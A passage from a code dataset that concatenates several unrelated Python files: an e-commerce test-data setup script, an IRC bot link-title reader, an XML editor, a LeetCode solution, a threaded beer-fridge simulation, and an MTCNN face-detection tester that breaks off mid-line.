testdata['data']['grantCount'],\n testdata['data']['value'],\n testdata['data']['useBaseLine'],\n self.server_url)\n self.session.get(url=test_url,headers=self.headers)\n return youhuiquan_json['gift']['id'],youhuiquan_data['couponName']\n\n def connectTestMysql(self):\n \"\"\"\n 链接测试环境数据库\n :returns:返回优惠码信息,giftID,couponName\n \"\"\"\n giftID,couponName=self.newCoupon()\n cur = self.conn_test.cursor()\n self.conn_test.select_db(self.test_mainDb)\n count = cur.execute('select code from coupon_codes WHERE CouponCodeBaseSettingId = {0}'.format(giftID))\n info = cur.fetchmany(count)\n self.conn_test.commit()\n cur.close()\n return info,giftID,couponName\n\n def createCouponTabel(self):\n \"\"\"\n 本地数据库 创建Coupon表\n \"\"\"\n getData,_id,name=self.connectTestMysql()\n cur = self.conn_local.cursor()\n self.conn_local.select_db('dianda_test')\n cur.execute('create table if not exists Coupon(id int ,couponName varchar(20),coupon_id int(10),coupon_code VARCHAR(20),PRIMARY KEY(id))')\n cur.execute('delete from Coupon')\n for data in getData:\n logging.info(str(data[0]))\n cur.execute(\"insert into Coupon(id,couponName,coupon_id,coupon_code)values('%d','%s','%d','%s')\" % (getData.index(data), name, _id, data[0]))\n self.conn_local.commit()\n cur.close()\n\n def createNewRedGift(self):\n \"\"\"\n 创建红包\n :return:\n \"\"\"\n name = self.createName()\n grantStart, grantEnd, useStart, useEnd = self.createTime()\n #登录\n login_url = '{0}/users/login'.format(self.server_url)\n login_data = {'userName':self.url_username,'password':self.url_password}\n login_response = self.session.post(url=login_url, data=login_data, headers=self.headers)\n #切换城市\n changzhou_url = '{0}/users/updateAgency'.format(self.server_url)\n changzhou_data = {'cityId': self.cityId, 'agencyId': 3}\n chanzhou_response = self.session.post(url=changzhou_url, data=changzhou_data, headers=self.headers)\n #新增红包\n redgift_url = '{0}/json/management/promotional/coupon/redgift/add'.format(self.server_url)\n \"\"\"\n ownLimit:用户拥有限制数量\n vipRank:vip无限制\n lifeTime:使用周期不限制\n \"\"\"\n redgift_data = {'name': name, 'type': u'普通红包', 'value': self.redGift_value, 'grantStart': grantStart,\n 'grantEnd': grantEnd, 'useStart': useStart, 'useEnd': useEnd,'lifeTime':-1,\n 'quantity': self.redGift_quantity, 'ownLimit': self.redGift_ownLimit, 'useBaseLine': self.redGift_useBaseLine,\n 'vipRank': '-1','instruction': self.redGift_instruction}\n redgift_response = self.session.post(redgift_url, data=redgift_data, headers=self.headers)\n redgift_str=self.changeIntoStr(redgift_response.text)\n redgift_json = json.loads(redgift_str)\n logging.info(str(redgift_json))\n return redgift_json\n\n def searchTestStoreUser(self):\n \"\"\"\n 搜索测试环境数据库stores账户信息\n \"\"\"\n pwd_MD5=self.returnMd5(self.device_login)\n cur = self.conn_test.cursor()\n self.conn_test.select_db(self.test_mainDb)\n count=cur.execute('select id,storeUser,storePwd,storeName,storePhoneNum,storeState,dadou,CityId,isFirstLogin from stores WHERE storeState= 1 AND CityId = {0} AND storePwd = \"{1}\" AND LENGTH(storePhoneNum)=11 '.format(self.cityId, pwd_MD5))\n info = cur.fetchmany(count)\n self.conn_test.commit()\n cur.close()\n return info[3]\n\n def createLoginDeviceTabel(self):\n \"\"\"\n 本地数据库 创建logindevice表\n \"\"\"\n _id, storeUser, storePwd, storeName, storePhoneNum, storeState, dadou, CityId, isFirstLogin = self.searchTestStoreUser()\n cur = self.conn_local.cursor()\n self.conn_local.select_db(self.local_mainDb)\n cur.execute('create table if not exists logindevice(id int ,storeUser varchar(20),storePwd varchar(50),storeName varchar(20),storePhoneNum varchar(15),storeState varchar(5),dadou varchar(10),CityId VARCHAR(10),isFirstLogin VARCHAR(5),PRIMARY KEY(id))')\n cur.execute(\"delete from logindevice\")\n cur.execute(\"insert into logindevice(id,storeUser,storePwd,storeName,storePhoneNum,storeState,dadou,CityId,isFirstLogin)values('%d','%s','%s','%s','%s','%s','%s','%s','%s')\" % (_id, storeUser, storePwd, storeName, storePhoneNum, storeState, dadou, CityId, isFirstLogin))\n logging.info(str(_id))\n self.conn_local.commit()\n cur.close()\n\n def UpdateTestUserDadou(self):\n \"\"\"\n 更新账号达豆数量,默认改为2000\n \"\"\"\n testID=self.getLocalLoginDeviceID()\n cur = self.conn_test.cursor()\n self.conn_test.select_db('ctcdb_new_test')\n cur.execute(\"update stores set dadou={0} where id = {1}\".format(self.dadouCount, testID[0]))\n # cur.execute('select dadou from stores WHERE id= {0}'.format(testID[0]))\n # info = cur.fetchone()\n # print info\n self.conn_test.commit()\n cur.close()\n\n def getLocalLoginDeviceID(self):\n \"\"\"\n 获取当前账号id\n :return: info\n \"\"\"\n cur = self.conn_local.cursor()\n self.conn_local.select_db(self.local_mainDb)\n cur.execute('select id from logindevice')\n info = cur.fetchone()\n self.conn_local.commit()\n cur.close()\n return info\n\n def clean_redis(self):\n \"\"\"\n 清空缓存购物车信息\n \"\"\"\n rd = redis.Redis(host=self.redis_db_ip, port=self.redis_port, db=self.redis_db)\n testID = self.getLocalLoginDeviceID()\n key_ = 'cart:{0}'.format(testID[0])\n if rd.exists(key_):\n rd.delete(key_)\n\n def newProduct(self):\n \"\"\"\n 新建上架商品\n \"\"\"\n publish_Name = self.createName()\n publish_time = self.createTime()\n #登录\n login_url = '{0}/users/login'.format(self.server_url)\n login_data = {'userName':self.url_username,'password':self.url_password}\n login_response = self.session.post(url=login_url, data=login_data, headers=self.headers)\n #选择常州\n changzhou_url = '{0}/users/updateAgency'.format(self.server_url)\n changzhou_data = {'cityId': self.cityId, 'agencyId': 3}\n chanzhou_response = self.session.post(url=changzhou_url, data=changzhou_data, headers=self.headers)\n # 排序单\n \"\"\"\n 'order[0][dir]': 'desc' 按可用库存排序\n \"\"\"\n kucun_url = '{0}/api/goods/stock/list'.format(self.server_url)\n kucun_data = {'draw': 2, 'order[0][dir]': 'desc'}\n kucun_response = self.session.post(url=kucun_url, data=kucun_data, headers=self.headers)\n kucun_str = self.changeIntoStr(kucun_response.text)\n kucun_json = json.loads(kucun_str)\n product_id = []\n for q in kucun_json['data']:\n if q['qoa'] > 1000:\n product_id.append(q['id'])\n if product_id:\n good_id = product_id[0]\n #上架操作\n publish_url = '{0}/api/goods/shelve/publish'.format(self.server_url)\n \"\"\"\n catalogId:商品分类\n areaPriceStr:价格定位\n \"\"\"\n publish_data = {'isDirectSell': '0', 'combos[0][isFree]': '0', 'comboType': '0', 'catalogId': '3010000','vip': '0', 'yjPrice': '0', 'id': good_id,\n 'isHotFirst': '0', 'title': publish_Name, 'specification': '1','combos[0][id]': good_id,'type': '0', 'combos[0][originalPrice]': '0',\n 'onSale': '0', 'dadou': '0','price': self.product_price, 'isAllFirst': '0','startTime': publish_time[0], 'isOrderLimit': 'unlimited', 'isTypeFirst': '0',\n 'endTime': publish_time[1], 'combos[0][packageNum]': '1','amount': '1', 'limit': self.procuct_limit, 'isDiscount': '1',\n 'areaPriceStr': '101:{0}#103:{1}#111:{2}#115:{3}#141:{4}#142:{5}#147:{6}#151:{7}#152:{8}#155:{9}#160:{10}#'.format(self.product_price,self.product_price,self.product_price,\n self.product_price,self.product_price,self.product_price,\n self.product_price,self.product_price,self.product_price,\n self.product_price,self.product_price),\n 'combos[0][unit]': '1', 'notSoldPriceArea': '[]', 'combos[0][price]': '0'}\n publish_response = self.session.post(url=publish_url, data=publish_data, headers=self.headers)\n publish_str = self.changeIntoStr(publish_response.text)\n publish_json = json.loads(publish_str)\n if publish_json['status'] == 1:\n search_id_url = '{0}/json/goods/shelve/list'.format(self.server_url)\n search_id_data = {'name': publish_Name}\n search_id_response = self.session.post(url=search_id_url, data=search_id_data, headers=self.headers)\n search_id_str = self.changeIntoStr(search_id_response.text)\n search_id_json = json.loads(search_id_str)\n if search_id_json['recordsTotal'] == 1:\n on_sell_data = [search_id_json['data'][0]['id'], search_id_json['data'][0]['name'], self.product_price, self.procuct_limit,good_id, self.cityId]\n return on_sell_data\n\n def createProductTable(self):\n \"\"\"\n 本地数据库 创建productcz表\n \"\"\"\n CZ_data=self.newProduct()\n if CZ_data:\n cur = self.conn_local.cursor()\n self.conn_local.select_db(self.local_mainDb)\n cur.execute('create table if not exists productcz(id int ,name varchar(50),price VARCHAR(10),`limit` int(10),GoodId int(10),CityId int(10), PRIMARY KEY(id))')\n cur.execute('delete from productcz')\n cur.execute(\"insert into productcz(id,name,price,`limit`,GoodId,CityId)values('%d','%s','%s','%d','%d','%d')\" % (CZ_data[0], CZ_data[1], CZ_data[2], CZ_data[3], CZ_data[4], CZ_data[5]))\n logging.info(str(CZ_data[0]))\n self.conn_local.commit()\n cur.close()\n\n def mainrun(self):\n \"\"\"\n 主函数运行\n \"\"\"\n preConditionForTest().createCouponTabel()\n preConditionForTest().createNewRedGift()\n preConditionForTest().createLoginDeviceTabel()\n preConditionForTest().UpdateTestUserDadou()\n preConditionForTest().createProductTable()\n preConditionForTest().clean_redis()\nif __name__==\"__main__\":\n preConditionForTest().mainrun()","sub_path":"ant/mainrun_cz.py","file_name":"mainrun_cz.py","file_ext":"py","file_size_in_byte":19187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"97406996","text":"from base import BotPlugin\nfrom tweepy import OAuthHandler, API as TWITTER_API\nfrom settings import TWITTER as T\nfrom response import random_response\nfrom urllib2 import urlopen\nimport re\nimport json\nimport requests\nimport lxml.html\nimport regex\n\nTWITTER_OAUTH = OAuthHandler(T['consumer_key'], T['consumer_secret'])\nTWITTER_OAUTH.set_access_token(T['access_token_key'], T['access_token_secret'])\nTWITTER = TWITTER_API(TWITTER_OAUTH)\n\n# These will be filtered out in _read_websites\n__all_non_web__ = [regex.TWITTER, regex.YOUTUBE, regex.VIMEO]\n\nVIDEO_RESPONSES = [\n \"That video is titled '%(title)s'. \"\n + \"You will waste %(seconds)ss of your life watching it. \",\n \"The title of that %(service)s video is '%(title)s'. \"\n + \"It has been viewed %(views)s times. \",\n \"Title: '%(title)s', Views: %(views)s, duration: %(seconds)ss.\",\n \"Title of that %(service)s video is '%(title)s'.\",\n \"%(service)s video is titled '%(title)s' and has %(rating)s.\",\n \"Here is the title of that %(service)s video: '%(title)s'.\",\n \"I found the title of that %(service)s video, here it is: '%(title)s'\",\n \"If you click that link you will watch a video titled '%(title)s'. \"\n + \"Good luck!\",\n]\n\nWEB_RESPONSES = [\n \"The title of that page is '%(title)s'\",\n \"That page might be about %(title)s\",\n \"That page has an interesting title: '%(title)s'\",\n \"The title of that page makes me want to read the whole thing '%(title)s'\",\n \"%(title)s\",\n]\n\n\nclass ReadLinks(BotPlugin):\n\n @staticmethod\n def _get_tweet_info(status_id):\n status = TWITTER.get_status(status_id)\n name = status.user.screen_name\n text = status.text.replace('\\n', ' ')\n return name, text\n\n def _read_twitter(self, channel, msg):\n twt_res = regex.TWITTER.search(msg)\n if not twt_res:\n return\n try:\n (name, text) = self._get_tweet_info(twt_res.group('id'))\n response = unicode(\"@\" + name + \" on Twitter says: \" + text)\n response = response.encode('utf8')\n self.bot.say(response, channel)\n except Exception:\n self.bot.log_error('Could not get tweet from: \"' + msg + '\"')\n self.bot.say('Sorry, I wasn\\'t able to read the last tweet :(',\n channel)\n\n @staticmethod\n def _get_vimeo_info(video_id):\n api_url = \"https://vimeo.com/api/v2/video/\" + video_id + \".json\"\n r = requests.get(api_url)\n video = json.loads(r.text)[0]\n if \"stats_number_of_likes\" in video:\n likes = (\"%d likes.\" % video[\"stats_number_of_likes\"])\n else:\n likes = \"an unknown number of likes\"\n return {\n 'service': \"vimeo\",\n 'title': video[\"title\"].encode('utf8'),\n 'seconds': str(video[\"duration\"]),\n 'views': str(video[\"stats_number_of_plays\"]),\n 'rating': likes,\n }\n\n def _read_vimeo(self, channel, msg):\n vimeo_res = regex.VIMEO.search(msg)\n if not vimeo_res:\n return\n try:\n video_info = self._get_vimeo_info(vimeo_res.group('id'))\n self.bot.say(random_response(VIDEO_RESPONSES) % video_info,\n channel)\n except Exception:\n self.bot.log_error('Could not get title of vimeo link from: \"'\n + msg + '\"')\n self.bot.say('For some reason I couldn\\'t read the title of that '\n + 'vimeo link.', channel)\n\n @staticmethod\n def _get_youtube_info(video_id):\n import pafy\n url = \"https://www.youtube.com/watch?v={0}\".format(video_id)\n video = pafy.new(url)\n\n if video.rating is not None:\n average_rating = float(video.rating)\n rating = (\"an average rating of %.2f\" % average_rating)\n else:\n rating = \"no rating\"\n return {\n 'service': \"youtube\",\n 'title': video.title.encode('utf-8'),\n 'seconds': video.length,\n 'views': video.viewcount,\n 'rating': rating,\n }\n\n def _read_youtube(self, channel, msg):\n yt_res = regex.YOUTUBE.search(msg)\n if not yt_res:\n return\n try:\n video_info = self._get_youtube_info(yt_res.group('id'))\n self.bot.say(random_response(VIDEO_RESPONSES) % video_info,\n channel)\n except Exception:\n self.bot.log_error('Could not get title of youtube link from: \"'\n + msg + '\"')\n self.bot.say('For some reason I couldn\\'t read the title of that '\n + 'youtube link.', channel)\n\n def _read_websites(self, channel, msg):\n links = regex.WEB_URL.findall(msg)\n for link in links:\n if [r for r in __all_non_web__ if r.search(link)]:\n continue\n try:\n t = lxml.html.parse(urlopen(link)) # noqa: E501 # nosec: regex.WEB_URL only allows http(s)\n t = t.find(\".//title\").text\n t = t.strip().replace('\\n', ' ')\n if len(re.sub(\"[^a-zA-Z0-9]\", \"\", t)) >= 5:\n self.bot.say(random_response(WEB_RESPONSES) % {'title': t},\n channel)\n except Exception:\n self.bot.log_error('Could not get title of webpage: \"'\n + msg + '\"')\n\n def handle_message(self, channel, nick, msg, line=None):\n if \"PRIVMSG\" in line:\n self._read_twitter(channel, msg)\n self._read_youtube(channel, msg)\n self._read_vimeo(channel, msg)\n self._read_websites(channel, msg)\n","sub_path":"src/plugins/read_links.py","file_name":"read_links.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"624592136","text":"# coding:utf-8\n\n# from xml.etree.ElementTree import ElementTree,Element\nfrom xml.etree import ElementTree as ET\n#\n#\n#\n# def read_xml(in_path):\n# \"\"\"\n# 读取并解析xml文件\n# :param in_path:xml路径\n# :return:ElementTree\n# \"\"\"\n# tree = ElementTree()\n# tree.parse(in_path)\n# return tree\n#\n#\n# def write_xml(tree,out_path):\n# \"\"\"\n# 将xml文件写出\n# :param tree: xml树\n# :param out_path: 写出路径\n# :return:\n# \"\"\"\n# tree.write(out_path,encoding=\"utf-8\", xml_declaration=True)\n#\n# def find_nodes(tree,path):\n# \"\"\"\n# 查找某个路径匹配的所有节点\n# :param tree: xml树\n# :param path: 节点路径\n# :return:\n# \"\"\"\n# return tree.findall(path)\n#\n# def change_node_text(nodelist,text,is_add=False,is_delete=False):\n# \"\"\"\n# 改变增加删除一个节点的文本\n# :param nodelist: 节点列表\n# :param text: 更新后的文本\n# :param is_add:\n# :param is_delete:\n# :return:\n# \"\"\"\n# for node in nodelist:\n# if is_add:\n# node.text += text\n# elif is_delete:\n# node.text = \"\"\n# else:\n# node.text = text\n#\n# def get_node_by_keyvalue(nodelist, kv_map):\n# \"\"\"\n# 根据属性及属性值定位符合的节点,返回节点\n# nodelist: 节点列表\n# kv_map: 匹配属性及属性值map\n# \"\"\"\n# result_nodes = []\n# for node in nodelist:\n# if if_match(node, kv_map):\n# result_nodes.append(node)\n# return result_nodes\n#\n# def if_match(node, kv_map):\n# '''判断某个节点是否包含所有传入参数属性\n# node: 节点\n# kv_map: 属性及属性值组成的map\n# '''\n# for key in kv_map:\n# if node.get(key) != kv_map.get(key):\n# return False\n# return True\n# ET.register_namespace(\"\", \"http://schemas.datacontract.org/2004/07/Xasd.FASC.SECM.Entity\")\nET.register_namespace(prefix=\"i\", uri=\"http://www.w3.org/2001/XMLSchema-instance\")\ntree = ET.parse(r\"C:\\Users\\Administrator\\Desktop\\lkxx.xml\")\nroot = tree.getroot()\n\nlk_id = root[3][0]\nfor i in lk_id:\n print(i.text)\nprint(root[3][0][15].text)\nlk_id_ele = root[3][0][15]\nlk_id_ele.text = \"0001\"\n\ntree.write(file_or_filename=\"lkxx.xml\",\n encoding=\"utf-8\",\n #default_namespace=\"http://schemas.datacontract.org/2004/07/Xasd.FASC. SECM.Entity\",\n xml_declaration=True)\n\nwith open(\"lkxx.xml\",\"rb\") as fp:\n data = fp.read().decode(\"utf-8\")\n print(data)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Airport/消息队列/rwXML.py","file_name":"rwXML.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"107242383","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# time: 2018/1/29 15:44\n\nclass Solution(object):\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n ret = []\n m1 = {}\n for a in nums1:\n if a not in m1:\n m1[a] = 1\n else:\n m1[a] += 1\n\n for b in nums2:\n if b in m1 and m1[b] > 0:\n m1[b] -= 1\n ret.append(b)\n return ret\n\n\nprint(Solution().intersection([1, 2, 2, 1], [2, 2]))\n","sub_path":"python/a350.py","file_name":"a350.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"270255221","text":"import random\nimport logging\nimport threading\nimport time\n\nlogging.basicConfig(\n format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\n\n\ncantidadMaximaLatas = 5\ncantidadMaximaBotellas = 5\n# CUANDO SE ENTREGA LA MERCADERIA POR EL PROVEEDOR SE GUARDA EN LA DESPENSA\nlatasEnDespensa = []\nbotellasEnDespensa = []\ncantHeladeras = 5\ncantProveedores = 20\ncantBebedores = 3\nlistaHeladeras = []\n# SEMAFORO PARA CARGA DE HELADERA\nsemaforocargaHeladera = threading.Semaphore(1)\nsemaforoProveedor = threading.Semaphore(1)\n# VARIABLE PARA SABER CUAL ES LA HELADERA MAS VACIA\nHeladeraMasVacia = 25\nHeladerasLlenadas = False\n\n\nclass Lata():\n def __init__(self, estado=\"Bien\"):\n super().__init__()\n self.estado = estado\n\n\nclass Botella():\n def __init__(self, estado=\"Bien\"):\n super().__init__()\n self.estado = estado\n\n\nclass Heladera(threading.Thread):\n def __init__(self, numeroHeladera):\n super().__init__()\n self.numeroHeladera = numeroHeladera\n self.Botellas = []\n self.Latas = []\n # AGREGO LA CANTIDAD DE FALTANTES QUE TIENE LA HELADERA\n self.Faltantes = cantidadMaximaBotellas + cantidadMaximaLatas\n self.primeraCarga = False\n\n def agregarBotella(self):\n # AGREGO LA BOTELLA A LA HELADERA Y SACO UNA DE LA DESPENSA\n self.Botellas.append(botellasEnDespensa.pop())\n\n def agregarLata(self):\n # AGREGO LA BOTELLA A LA HELADERA Y SACO UNA DE LA DESPENSA\n self.Latas.append(latasEnDespensa.pop())\n\n def run(self):\n logging.info(\n f'Enchufo la heladera {self.numeroHeladera} y comienzo a llenarla')\n while True:\n\n # CONSULTO SI ES LA MAS VACIA\n if (self.numeroHeladera == HeladeraMasVacia or self.primeraCarga == False):\n\n # CONSULTO SI FALTA LLENAR BOTELLAS Y SI TENGO DISPONIBLE\n if len(self.Botellas) < cantidadMaximaBotellas and len(botellasEnDespensa) > 0:\n self.agregarBotella()\n if len(self.Latas) < cantidadMaximaLatas and len(latasEnDespensa) > 0:\n self.agregarLata()\n # UNA VEZ ESTA LLENA LA HELADERA SUELTO EL SEMAFORO PARA QUE LO PUEDA TOMAR LA SIGUIENTE\n if len(self.Botellas) == cantidadMaximaBotellas and len(self.Latas) == cantidadMaximaLatas:\n if(self.primeraCarga == False):\n logging.info(\n f'Termine de llenar la Heladera {self.numeroHeladera} y presiono el botón de enfriado rápido')\n self.primeraCarga = True\n else:\n logging.info(\n f'Se relleno la Heladera {self.numeroHeladera}')\n semaforocargaHeladera.release()\n time.sleep(10)\n\n\nclass Despensa(threading.Thread):\n def __init__(self, cantHeladeras):\n super().__init__()\n self.cantidadHeladeras = cantHeladeras\n\n def comprarHeladeras(self):\n for i in range(self.cantidadHeladeras):\n listaHeladeras.append(Heladera(i))\n\n def llenarHeladera(self):\n for i in range(self.cantidadHeladeras):\n semaforocargaHeladera.acquire()\n listaHeladeras[i].start()\n HeladerasLlenadas = True\n\n def rellenarHeladera(self):\n semaforocargaHeladera.acquire()\n cantidadFaltante = 0\n global HeladeraMasVacia\n masVaciaAnterior = HeladeraMasVacia\n while HeladeraMasVacia == masVaciaAnterior:\n\n for i in range(self.cantidadHeladeras):\n if ((cantidadMaximaLatas + cantidadMaximaBotellas) - (len(listaHeladeras[i].Botellas) + len(listaHeladeras[i].Latas))) > cantidadFaltante:\n HeladeraMasVacia = i\n logging.info(\n f'La Heladera {HeladeraMasVacia} es la que mas faltantes tiene')\n semaforocargaHeladera.release()\n\n def run(self):\n self.comprarHeladeras()\n self.llenarHeladera()\n while True:\n self.rellenarHeladera()\n\n\nclass Proveedor(threading.Thread):\n def __init__(self, numero):\n super().__init__()\n self.numero = numero\n self.latasAEntregar = random.randint(1, 5)\n self.botellasAEntregar = random.randint(1, 5)\n\n def decargarLatas(self):\n logging.info(\n f'Proveeror {self.numero}: Le entrego {self.latasAEntregar} latas')\n for i in range(self.latasAEntregar):\n latasEnDespensa.append(Lata())\n\n def descargarBotellas(self):\n logging.info(\n f'Proveeror {self.numero}: Le entrego {self.botellasAEntregar} botellas')\n for i in range(self.latasAEntregar):\n botellasEnDespensa.append(Botella())\n\n def run(self):\n semaforoProveedor.acquire()\n self.decargarLatas()\n self.descargarBotellas()\n semaforoProveedor.release()\n\n# MODIFICACION PARA BONUS\n\n\nclass Bebedor(threading.Thread):\n def __init__(self, numero, cantMaxLatas, cantMaxBotellas):\n super().__init__()\n self.numero = numero\n self.cantMaximaLatas = cantMaxLatas\n self.cantMaximaBotellas = cantMaxBotellas\n # MEDIANTE RAMDOM LE ASIGNO UNA HELADERA DONDE BEBERÁ\n self.heladeraElegida = random.randint(0, cantHeladeras - 1)\n logging.info(\n f'Bebedor {self.numero}: Hola, me voy a tomar {self.cantMaximaLatas} latas y {self.cantMaximaBotellas} botellas de la heladera {self.heladeraElegida}')\n\n def tomarLata(self):\n logging.info(\n f'Bebedor {self.numero}: Me tomo una lata de cerveza')\n listaHeladeras[self.heladeraElegida].Latas.pop()\n self.cantMaximaLatas -= 1\n time.sleep(3)\n\n def tomarBotella(self):\n logging.info(\n f'Bebedor {self.numero}: Me tomo una botella de cerveza')\n listaHeladeras[self.heladeraElegida].Botellas.pop()\n self.cantMaximaBotellas -= 1\n time.sleep(3)\n\n def run(self):\n semaforoProveedor.acquire()\n while self.cantMaximaBotellas > 0 or self.cantMaximaLatas > 0:\n\n if len(listaHeladeras[self.heladeraElegida].Latas) > 0 and self.cantMaximaLatas > 0:\n self.tomarLata()\n if len(listaHeladeras[self.heladeraElegida].Botellas) > 0 and self.cantMaximaBotellas > 0:\n self.tomarBotella()\n logging.info(\n f'Bebedor {self.numero}: Me tome todo, creo que me voy a desmayar!!!')\n semaforoProveedor.release()\n\n# CLASE CONTROLADOR DE HELADERAS: CADA TANTO TIEMPO EL INSPECTOR REVISA LAS HELADERAS PARA VER SINO HAY LATAS PINCHADAS\n\n\nclass Inspector(threading.Thread):\n def __init__(self):\n super().__init__()\n\n def run(self):\n # REVISO TODAS LAS HELADERAS PARA VER SI EXISTE ALGUNA LATA PINCHADA\n while True:\n for i in range(cantHeladeras-1):\n\n for j in range(len(listaHeladeras[i].Latas) - 1):\n if listaHeladeras[i].Latas[j].estado != \"Bien\":\n listaHeladeras[i].Latas.pop(j)\n logging.info(\n f'Inspector: Encontre la lata {j} pinchada en la Heladera {i}!!!')\n time.sleep(10)\n\n\nDespensa(cantHeladeras).start()\n\nfor i in range(cantProveedores):\n Proveedor(i).start()\n\n\nfor i in range(cantBebedores):\n # RANDOM PARA VER QUE TIPO DE BEBEDOR ES\n # SI ES 1 SOLO BEBE LATAS, 2 SOLO BOTELLAS Y 3 AMBAS\n tipo = random.randint(1, 3)\n if tipo == 1:\n cantbotellas = 0\n cantidadLatas = random.randint(1, 5)\n Bebedor(i, cantbotellas, cantidadLatas).start()\n elif tipo == 2:\n cantbotellas = random.randint(1, 3)\n cantidadLatas = 0\n Bebedor(i, cantbotellas, cantidadLatas).start()\n else:\n cantbotellas = random.randint(1, 3)\n cantidadLatas = random.randint(1, 5)\n Bebedor(i, cantbotellas, cantidadLatas).start()\n\n\nInspector().start()\n\nwhile True:\n\n # SOLO SE PUEDE PINCHAR CUANDO TODAS LAS HELADERAS ESTEN LLENAS\n if HeladerasLlenadas == True:\n\n # SIMULAR EL PINCHADO DE LATAS\n heladeraAleatoria = random.randint(0, cantHeladeras - 1)\n lataAleatoria = random.randint(0, cantidadMaximaLatas - 1)\n listaHeladeras[heladeraAleatoria].Latas[lataAleatoria].estado = \"Pinchada\"\n logging.info(\n f' Se ha pinchado la lata {lataAleatoria} en la Heladera {heladeraAleatoria}!!!')\n time.sleep(15)\n","sub_path":"Python-TP-Bonus-3.py","file_name":"Python-TP-Bonus-3.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"370823342","text":"# -*-coding:utf-8-*-\nimport os\nimport cv2\nimport net\nimport torch\nimport utils\nimport datetime\nimport numpy as np \nimport PIL.Image as Image\nimport torchvision.transforms as tf\n\n\nclass Test:\n \"\"\"pyramid\n p: p_net\n r: r_net\n o: o_net\"\"\"\n def __init__(self, test_img):\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.image = Image.fromarray(np.uint8(test_img[:, :, [2, 1, 0]])) # for croped transform cv2 to PIL\n self.img = self.image # for pyramid\n \n self.pnet = net.PNet().to(self.device)\n self.pnet.load_state_dict(torch.load(\"./params/pnet.pkl\"))\n self.pnet.eval()\n \n self.rnet = net.RNet().to(self.device)\n self.rnet.load_state_dict(torch.load(\"./params/rnet.pkl\"))\n self.rnet.eval()\n\n self.onet = net.ONet().to(self.device)\n self.onet.load_state_dict(torch.load(\"./params/onet.pkl\"))\n self.onet.eval()\n\n def pyramid(self, scal=0.707):\n \"resize the image to smaller size\"\n w, h = self.img.size\n self.img = self.img.resize((int(scal*w), int(scal*h)))\n return self.img\n \n def p(self):\n \"\"\"transform out of tensor to numpy\n filter with confidence\n calculate coordinates\n filter with NMS\n crop image from original image for RNet's input\n draw\"\"\"\n start_time = datetime.datetime.now()\n r_prior, r_data = [], [] # collect RNet's prior, RNet's input\n coordinates = [] # collect coordinates for draw\n count = 0\n while min(self.img.size) > 12:\n scal = 0.707**count # 0.707 make the area half of origin image\n input = tf.ToTensor()(self.img).unsqueeze(dim=0)-0.5\n with torch.no_grad():\n confi, offset = self.pnet(input.cuda())\n confi, offset = confi.transpose(1, -1), offset.transpose(1, -1)\n\n mask = confi[..., 0] > 0.9\n confi = confi[mask].cpu().numpy() # filter confi\n offset = offset[mask].cpu().numpy() # filter offset\n\n index = mask.nonzero().cpu().numpy() # index \n x_index, y_index = index[:, 1:2], index[:, 2:3]\n x1, y1, x2, y2 = x_index*2/scal, y_index*2/scal, (x_index*2+12)/scal, (y_index*2+12)/scal # top_left*scal=index*stride bottom_right*scal=top_left+12\n p_prior = np.hstack(([x1, y1, x2, y2])) # translate to numpy which ndim=2\n\n offset, landmarks = offset[:, :4], offset[:, 4:]\n offset, landmarks = utils.transform(offset, landmarks, p_prior)\n \n boxes = np.hstack((offset, confi, landmarks)) # [[offset+confi+landmarks]] for NMS\n boxes = utils.NMS(boxes, threshold=0.7, ismin=False)\n coordinates.extend(boxes.tolist())\n if boxes.shape[0] == 0:\n break\n\n data, prior = utils.crop_to_square(boxes[:, :5], 24, self.image)\n r_prior.extend(prior)\n r_data.extend(data)\n self.img = self.pyramid() \n count += 1 \n\n r_prior = np.stack(r_prior, axis=0) \n r_data = torch.stack(r_data, dim=0)\n end_time = datetime.datetime.now()\n print(\"PNet cost {}ms\".format((end_time - start_time).microseconds/1000))\n return r_data, r_prior\n \n def r(self):\n \"\"\"transform out of tensor to numpy\n filter with confidence\n calculate coordinates\n filter with NMS\n crop image from original image for ONet's input\n draw\"\"\"\n start_time = datetime.datetime.now()\n data, prior = self.p()\n with torch.no_grad():\n confi, offset = self.rnet(data.cuda())\n confi = confi.cpu().numpy().flatten()\n offset = offset.cpu().numpy()\n\n offset, prior, confi = offset[confi > 0.99], prior[confi > 0.99], confi[confi > 0.99]\n\n offset, landmarks = offset[:, :4], offset[:, 4:]\n offset, landmarks = utils.transform(offset, landmarks, prior)\n\n boxes = np.hstack((offset, np.expand_dims(confi, axis=1), landmarks))\n boxes = utils.NMS(boxes, threshold=0.6, ismin=False)\n \n o_data, o_prior = utils.crop_to_square(boxes[:, :5], 48, self.image)\n\n o_prior = np.stack(o_prior, axis=0) \n o_data = torch.stack(o_data, dim=0)\n end_time = datetime.datetime.now()\n print(\"RNet cost {}ms\".format((end_time - start_time).microseconds/1000))\n return o_data, o_prior\n \n def o(self):\n \"\"\"transform out of tensor to numpy\n filter with confidence\n calculate coordinates\n filter with NMS\n draw\"\"\"\n start_time = datetime.datetime.now()\n data, prior = self.r()\n with torch.no_grad():\n confi, offset = self.onet(data.cuda())\n confi = confi.cpu().numpy().flatten()\n offset = offset.cpu().numpy()\n\n offset, prior, confi = offset[confi >= 0.999], prior[confi >= 0.999], confi[confi >= 0.999]\n\n offset, landmarks = offset[:, :4], offset[:, 4:]\n offset, landmarks = utils.transform(offset, landmarks, prior)\n\n boxes = np.hstack((offset, 